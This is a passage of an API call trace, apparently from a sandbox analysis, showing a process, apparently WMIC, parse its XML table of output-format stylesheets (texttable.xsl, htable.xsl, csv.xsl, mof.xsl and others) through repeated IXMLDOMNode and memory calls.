namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.574] free (_Block=0x437110) [0240.574] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0240.575] malloc (_Size=0x18) returned 0x43c560 [0240.575] malloc (_Size=0x18) returned 0x43c580 [0240.575] SysStringLen (param_1="VALUE") returned 0x5 [0240.575] SysStringLen (param_1="TABLE") returned 0x5 [0240.575] SysStringLen (param_1="TABLE") returned 0x5 [0240.575] SysStringLen (param_1="VALUE") returned 0x5 [0240.575] malloc (_Size=0x30) returned 0x4380c0 [0240.575] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.575] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.575] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.575] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=2, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.575] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="textvaluelist.xsl") returned 0x0 [0240.575] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.575] malloc (_Size=0x18) returned 0x43c5a0 [0240.575] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.575] free (_Block=0x43c5a0) [0240.575] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0240.575] malloc (_Size=0x18) returned 0x43c5a0 [0240.576] malloc (_Size=0x18) returned 0x43c5c0 [0240.576] SysStringLen (param_1="LIST") returned 0x4 [0240.576] SysStringLen (param_1="TABLE") returned 0x5 [0240.576] malloc (_Size=0x30) returned 0x438100 [0240.576] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.576] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.576] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.576] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=3, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.576] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="rawxml.xsl") returned 0x0 [0240.576] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.576] malloc (_Size=0x18) returned 0x43c5e0 [0240.576] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.576] free (_Block=0x43c5e0) [0240.576] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0240.576] malloc (_Size=0x18) returned 0x43c5e0 [0240.576] malloc (_Size=0x18) returned 0x43c600 [0240.577] SysStringLen (param_1="RAWXML") returned 0x6 [0240.577] SysStringLen (param_1="TABLE") returned 0x5 [0240.577] SysStringLen (param_1="RAWXML") returned 0x6 [0240.577] SysStringLen (param_1="LIST") returned 0x4 [0240.577] SysStringLen (param_1="LIST") returned 0x4 [0240.577] SysStringLen (param_1="RAWXML") returned 0x6 [0240.577] malloc (_Size=0x30) returned 0x438140 [0240.577] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.577] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.577] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.577] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=4, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.577] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="htable.xsl") returned 0x0 [0240.577] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.577] malloc (_Size=0x18) returned 0x43c620 [0240.577] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.577] free (_Block=0x43c620) [0240.577] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0240.577] malloc (_Size=0x18) returned 0x43c620 [0240.577] malloc (_Size=0x18) returned 0x43c640 [0240.578] SysStringLen (param_1="HTABLE") returned 0x6 [0240.578] SysStringLen (param_1="TABLE") returned 0x5 [0240.578] SysStringLen (param_1="HTABLE") returned 0x6 [0240.578] SysStringLen (param_1="LIST") returned 0x4 [0240.578] malloc (_Size=0x30) returned 0x438180 [0240.578] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.578] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.578] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.578] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=5, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.578] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="hform.xsl") returned 0x0 [0240.578] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.578] malloc (_Size=0x18) returned 0x43c660 [0240.578] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.578] free (_Block=0x43c660) [0240.578] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0240.578] malloc (_Size=0x18) returned 0x43c660 [0240.578] malloc (_Size=0x18) returned 0x43c680 [0240.578] SysStringLen (param_1="HFORM") returned 0x5 [0240.579] SysStringLen (param_1="TABLE") returned 0x5 [0240.579] SysStringLen (param_1="HFORM") returned 0x5 [0240.579] SysStringLen (param_1="LIST") returned 0x4 [0240.579] SysStringLen (param_1="HFORM") returned 0x5 [0240.579] SysStringLen (param_1="HTABLE") returned 0x6 [0240.579] malloc (_Size=0x30) returned 0x4381c0 [0240.579] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.579] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.579] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.579] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=6, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.579] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="xml.xsl") returned 0x0 [0240.579] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.580] malloc (_Size=0x18) returned 0x43c6a0 [0240.580] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.580] free (_Block=0x43c6a0) [0240.580] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0240.580] malloc (_Size=0x18) returned 0x43c6a0 [0240.580] malloc (_Size=0x18) returned 0x43c6c0 [0240.580] SysStringLen (param_1="XML") returned 0x3 [0240.580] SysStringLen (param_1="TABLE") returned 0x5 [0240.580] SysStringLen (param_1="XML") returned 0x3 [0240.580] SysStringLen (param_1="VALUE") returned 0x5 [0240.580] SysStringLen (param_1="VALUE") returned 0x5 [0240.580] SysStringLen (param_1="XML") returned 0x3 [0240.580] malloc (_Size=0x30) returned 0x438200 [0240.580] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.580] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.580] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.580] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=7, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.581] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="mof.xsl") returned 0x0 [0240.581] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.581] malloc (_Size=0x18) returned 0x43c6e0 [0240.581] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.581] free (_Block=0x43c6e0) [0240.581] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0240.581] malloc (_Size=0x18) returned 0x43c6e0 [0240.581] malloc (_Size=0x18) returned 0x43c700 [0240.581] SysStringLen (param_1="MOF") returned 0x3 [0240.581] SysStringLen (param_1="TABLE") returned 0x5 [0240.581] SysStringLen (param_1="MOF") returned 0x3 [0240.581] SysStringLen (param_1="LIST") returned 0x4 [0240.581] SysStringLen (param_1="MOF") returned 0x3 [0240.581] SysStringLen (param_1="RAWXML") returned 0x6 [0240.581] SysStringLen (param_1="LIST") returned 0x4 [0240.581] SysStringLen (param_1="MOF") returned 0x3 [0240.581] malloc (_Size=0x30) returned 0x438240 [0240.581] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.581] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.581] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.582] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=8, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.582] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="csv.xsl") returned 0x0 [0240.582] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.582] malloc (_Size=0x18) returned 0x43c720 [0240.582] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.582] free (_Block=0x43c720) [0240.582] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0240.582] malloc (_Size=0x18) returned 0x43c720 [0240.582] malloc (_Size=0x18) returned 0x43c740 [0240.582] SysStringLen (param_1="CSV") returned 0x3 [0240.582] SysStringLen (param_1="TABLE") returned 0x5 [0240.582] SysStringLen (param_1="CSV") returned 0x3 [0240.582] SysStringLen (param_1="LIST") returned 0x4 [0240.582] SysStringLen (param_1="CSV") returned 0x3 [0240.582] SysStringLen (param_1="HTABLE") returned 0x6 [0240.582] SysStringLen (param_1="CSV") returned 0x3 [0240.582] SysStringLen (param_1="HFORM") returned 0x5 [0240.582] malloc (_Size=0x30) returned 0x438280 [0240.583] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.583] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.583] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.583] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=9, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.583] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="texttable.xsl") returned 0x0 [0240.583] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.583] malloc (_Size=0x18) returned 0x43c760 [0240.583] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.583] free (_Block=0x43c760) [0240.583] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0240.583] malloc (_Size=0x18) returned 0x43c760 [0240.583] malloc (_Size=0x18) returned 0x43c780 [0240.583] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.583] SysStringLen (param_1="TABLE") returned 0x5 [0240.583] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.583] SysStringLen (param_1="VALUE") returned 0x5 [0240.584] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.584] SysStringLen (param_1="XML") returned 0x3 [0240.584] SysStringLen (param_1="XML") returned 0x3 [0240.584] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.584] malloc (_Size=0x30) returned 0x4382c0 [0240.584] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.584] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.584] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.584] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=10, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.584] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="texttable.xsl") returned 0x0 [0240.584] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.584] malloc (_Size=0x18) returned 0x43c7a0 [0240.584] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.584] free (_Block=0x43c7a0) [0240.584] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0240.584] malloc (_Size=0x18) returned 0x43c7a0 [0240.584] malloc (_Size=0x18) returned 0x43c7c0 [0240.585] SysStringLen (param_1="texttablewsys") returned 0xd [0240.585] SysStringLen (param_1="TABLE") returned 0x5 [0240.585] SysStringLen (param_1="texttablewsys") returned 0xd [0240.585] SysStringLen (param_1="XML") returned 0x3 [0240.585] SysStringLen (param_1="texttablewsys") returned 0xd [0240.585] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.585] SysStringLen (param_1="XML") returned 0x3 [0240.585] SysStringLen (param_1="texttablewsys") returned 0xd [0240.585] malloc (_Size=0x30) returned 0x438300 [0240.585] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.585] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.585] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.585] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=11, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.585] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="texttable.xsl") returned 0x0 [0240.585] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.585] malloc (_Size=0x18) returned 0x43c7e0 [0240.585] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.585] free (_Block=0x43c7e0) [0240.585] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0240.586] malloc (_Size=0x18) returned 0x43c7e0 [0240.586] malloc (_Size=0x18) returned 0x43c800 [0240.586] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0240.586] SysStringLen (param_1="TABLE") returned 0x5 [0240.586] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0240.586] SysStringLen (param_1="XML") returned 0x3 [0240.586] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0240.586] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.586] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.586] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0240.586] malloc (_Size=0x30) returned 0x438340 [0240.586] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.586] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.586] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.586] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=12, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.586] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="texttable.xsl") returned 0x0 [0240.586] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.586] malloc (_Size=0x18) returned 0x43c820 [0240.586] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.587] free (_Block=0x43c820) [0240.587] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0240.587] malloc (_Size=0x18) returned 0x43c820 [0240.587] malloc (_Size=0x18) returned 0x43c840 [0240.587] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0240.587] SysStringLen (param_1="TABLE") returned 0x5 [0240.587] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0240.587] SysStringLen (param_1="XML") returned 0x3 [0240.587] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0240.587] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.587] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0240.587] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0240.587] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.587] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0240.587] malloc (_Size=0x30) returned 0x438380 [0240.587] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.587] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.587] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.587] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=13, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.587] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="texttable.xsl") returned 0x0 [0240.587] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.588] malloc (_Size=0x18) returned 0x43c860 [0240.588] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.588] free (_Block=0x43c860) [0240.588] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0240.588] malloc (_Size=0x18) returned 0x43c860 [0240.588] malloc (_Size=0x18) returned 0x43c880 [0240.588] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0240.588] SysStringLen (param_1="TABLE") returned 0x5 [0240.588] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0240.588] SysStringLen (param_1="XML") returned 0x3 [0240.588] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0240.588] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.588] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0240.588] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0240.588] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0240.588] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0240.588] malloc (_Size=0x30) returned 0x4383c0 [0240.588] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.588] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.588] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.589] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=14, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.589] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="texttable.xsl") returned 0x0 [0240.589] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.589] malloc (_Size=0x18) returned 0x43c8a0 [0240.589] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.589] free (_Block=0x43c8a0) [0240.589] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0240.589] malloc (_Size=0x18) returned 0x43c8a0 [0240.589] malloc (_Size=0x18) returned 0x43c8c0 [0240.589] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0240.589] SysStringLen (param_1="TABLE") returned 0x5 [0240.589] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0240.589] SysStringLen (param_1="XML") returned 0x3 [0240.589] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0240.589] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.589] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0240.589] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0240.589] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0240.589] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0240.590] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0240.590] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0240.590] malloc (_Size=0x30) returned 0x438400 [0240.590] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.590] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.590] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.590] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=15, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.590] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="htable.xsl") returned 0x0 [0240.590] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.590] malloc (_Size=0x18) returned 0x43c8e0 [0240.590] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.590] free (_Block=0x43c8e0) [0240.590] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0240.590] malloc (_Size=0x18) returned 0x43c8e0 [0240.590] malloc (_Size=0x18) returned 0x43c900 [0240.590] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0240.590] SysStringLen (param_1="TABLE") returned 0x5 [0240.590] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0240.591] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.591] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0240.591] SysStringLen (param_1="XML") returned 0x3 [0240.591] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0240.591] SysStringLen (param_1="texttablewsys") returned 0xd [0240.591] SysStringLen (param_1="XML") returned 0x3 [0240.591] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0240.591] malloc (_Size=0x30) returned 0x438440 [0240.591] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.591] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.591] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.591] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=16, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.591] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="htable.xsl") returned 0x0 [0240.591] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.591] malloc (_Size=0x18) returned 0x43c920 [0240.591] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.591] free (_Block=0x43c920) [0240.591] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0240.591] malloc (_Size=0x18) returned 0x43c920 [0240.592] malloc (_Size=0x18) returned 0x43c940 [0240.592] SysStringLen (param_1="htable-sortby") returned 0xd [0240.592] SysStringLen (param_1="TABLE") returned 0x5 [0240.592] SysStringLen (param_1="htable-sortby") returned 0xd [0240.592] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.592] SysStringLen (param_1="htable-sortby") returned 0xd [0240.592] SysStringLen (param_1="XML") returned 0x3 [0240.592] SysStringLen (param_1="htable-sortby") returned 0xd [0240.592] SysStringLen (param_1="texttablewsys") returned 0xd [0240.592] SysStringLen (param_1="htable-sortby") returned 0xd [0240.592] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0240.592] SysStringLen (param_1="XML") returned 0x3 [0240.592] SysStringLen (param_1="htable-sortby") returned 0xd [0240.592] malloc (_Size=0x30) returned 0x438480 [0240.592] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.592] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.592] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.592] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=17, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.592] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="mof.xsl") returned 0x0 [0240.592] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.592] malloc (_Size=0x18) returned 0x43c960 [0240.593] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.593] free (_Block=0x43c960) [0240.593] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0240.593] malloc (_Size=0x18) returned 0x43c960 [0240.593] malloc (_Size=0x18) returned 0x43c980 [0240.593] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 